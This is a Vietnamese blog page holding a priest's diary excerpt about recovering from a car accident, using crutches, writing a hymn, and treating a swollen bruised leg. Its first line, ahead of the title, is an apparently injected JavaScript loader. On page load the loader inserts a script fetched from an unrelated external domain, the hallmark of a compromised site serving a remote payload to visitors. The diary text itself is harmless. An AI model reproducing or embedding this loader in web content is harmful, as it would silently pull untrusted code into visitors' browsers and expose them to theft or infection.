;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 018-TAI NẠN XE TÔNG-(Tiếp) – Xitô PS

018-TAI NẠN XE TÔNG-(Tiếp)

 

 

TAI NẠN XE TÔNG.(Tiếp)

TRÍCH NHẬT KÝ -linh mục Mai Thiện.
21.8. 2018

Hôm nay chân bớt sưng rồi, đã có “dáng” bắp chân chứ không căng tròn như trước! Nhưng bàn chân vẫn còn sưng múp, mũm mĩm như chân em bé! Chiều hôm qua đã “nháp” đi nạng xuống cầu thang, vô nhà bếp rồi “nạng” lên lầu hai lại, thấy không vấn đề gì, cứ từ từ, cẩn trọng. Khi lên xuống cầu thang thì một tay vịn cầu thang, một tay dùng cùng lúc hai nạng kẹp lại…
Dịp bị nạn như thế này, bỗng thấy có nhiều giờ rảnh. Tuy nhiên không rơi vào tâm trạng buồn sầu vì có việc làm luôn! Rảnh thì làm lại sổ sách, đọc sách đọc báo tha hồ, còn có thì giờ theo dõi Á Vận Hội Asiad 2018 nữa. Có hai người điện thoại thăm từ xa, nhắc sáng tác nhạc đi, nên cũng lấy giấy bút ra, “đẻ” được một bài!
Việc sáng tác nhạc có khi cũng cần đến sự khích lệ, yêu cầu của người khác. (Có khi người ta yêu cầu tha thiết mà cứ loay hoay, cầm bút viết rồi lại thả bút ra, không hoàn thành được yêu cầu). Dịp kỷ niệm 100 năm dòng thành lập vừa qua, cha GB Dũng phụ trách kỷ yếu đề nghị mình đóng góp một bài nhạc để in vào kỷ yếu. Dầu không hào hứng gì, mình cũng bắt tay viết, động não tí, để ý viết, nộp trước “thời hạn” là ba tuần. Nhờ phòng thu ghi âm, sau đó đưa lên mạng. Bài nhạc thành công, đón nhận nhiều lời khen… Nếu ai chưa có dịp nghe bài “Niềm vui mênh mang” thì có thể vào mạng “Hội Dòng Xi Tô Thánh Gia”, mục diễn nguyện sẽ nghe bài nhạc này được lồng vào đầu chương trình.
22.8.2018
Tìm kiếm trên mạng về chủ đề : “cách điều trị dập mô mềm”, mình hiểu ra những sai lầm trong hai tuần qua khiến chân sưng dai dẳng.
Khi bi dập mô, cần thiết phải chườm lạnh ngay để không bị bầm tụ máu, gây hiện tượng thâm tím da thịt, điều nay may mắn vì khi bị nạn, các sr dòng Đa Minh Tam Hiệp đã chườm lạnh cho ngay, sáng hôm sau chườm nữa.
Theo nguyên tắc, chỉ chườm lạnh hai ngày đầu thôi, để vết thương, các mao mạch “co lại” không chảy máu, sau đó chườm nóng để giúp máu lưu thông mới mau khỏi. Mà mình đã chườm lạnh cách “chăm chỉ ” hơn …. 10 ngày!
(Còn tiếp)

You May Also Like

Trả lời

X